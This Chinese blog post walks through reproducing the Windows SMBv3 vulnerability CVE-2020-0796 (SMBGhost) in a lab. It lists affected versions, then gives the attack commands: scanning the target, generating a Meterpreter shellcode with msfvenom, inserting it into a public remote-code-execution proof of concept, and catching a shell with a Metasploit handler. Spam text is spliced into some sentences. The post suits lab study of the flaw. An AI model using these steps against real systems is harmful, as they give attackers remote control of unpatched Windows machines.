如何实现CVE-2020-0796漏洞复现


如何实现CVE-2020-0796漏洞复现,相信很多没有经验的人对此束手无策,为此本文总结了问题出现的原因和解决方法,通过这篇文章希望你能解决这个问题。CVE-2020-0796是由于SMBv3协议在处理恶意的压缩数据包时出错所造成的;在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。它可让远程且未经身份验证的攻击者在目标系统上执行任意代码,该漏洞类似于永恒之蓝。漏洞危害等级:高Windows 10 Version 1903 for 32-bit SystemsWindows 10 Version 1903 for x64-based SystemsWindows 10 Version 1903 for ARM64-based SystemsWindows Server, Version 1903 (Server Core installation)Windows 10 Version 1909 for 32-bit SystemsWindows 10 Version 1909 for x64-based SystemsWindows 10 Version 1909 for ARM64-based SystemsWindows Server, Version 1909 (Server Core installation)靶机:存在漏洞的win10虚免费云主机域名拟机环境,系统镜像:ed2k://|file|cn_windows_10_consumer_editions_version_1903_x64_dvd_8f05241d.iso|4905476096|F28FDC23DA34D55BA466BFD6E91DD311|/ip地址:192.168.117.150安装镜像后的注意事项: 将windows10的防火墙关掉,使能互相ping通 将window10的自动更新关掉,避免漏洞被打补丁检测工具:https://github.com/dickens88/cve-2020-0796-scannergetshell代码:https://github.com/chompie1337/SMBGhost_RCE_PoC攻击机:kaliip地址:192.168.117.1321、先用检测代码对目标主机进行扫描,发现存在漏洞python3 cve-2020-0796-scanner.py -t 192.168.117.1502.使用msfvenom命令生成shellcode代码msfvenom -p windows/x64/meterpreter/bind_tcp lport=3333 -f py -o shellcode.txt将生成的shellcode.txt中的代码替换getshell代码中exploit.py中的USER_PAYLOAD部分3.开启kali中的msf使用handler模块开启监听msfconsoleuse exploit/multi/handlerset payload windows/x64/meterpreter/bind_tcpset rhost 192.168.117.150set lport 3333run4.运行修改好的漏洞利用代码:python3 exploit.py -ip 192.168.117.1505.发现在msf控制台成功获得反弹shell6.发现有乱码,使用chcp 65001显示正常至此复现完成 修改后的源码有些错误需要改看完上述内容,你们掌握如何实现CVE-2020-0796漏洞复现的方法了吗?如果还想学到更多技能或想了解更多相关内容,欢迎关注云编程开发博客行业资讯频道,感谢各位的阅读!

相关推荐: 四类特殊IP地址

1.直接广播地址:X.X.X.255(ip最后一位为255免费云主机域名)2.受限广播地址:255.255.255.255(全四位为255)这个子网网络只有一个IP地址,代表主机。在路由方面是全匹配,只能匹配一个ip3.这个网络上的特定主机:0.0.0.X(X…

免责声明:本站发布的图片视频文字,以转载和分享为主,文章观点不代表本站立场,本站不承担相关法律责任;如果涉及侵权请联系邮箱:360163164@qq.com举报,并提供相关证据,经查实将立刻删除涉嫌侵权内容。

(0)
打赏 微信扫一扫 微信扫一扫
上一篇 02/05 11:58
下一篇 02/05 11:58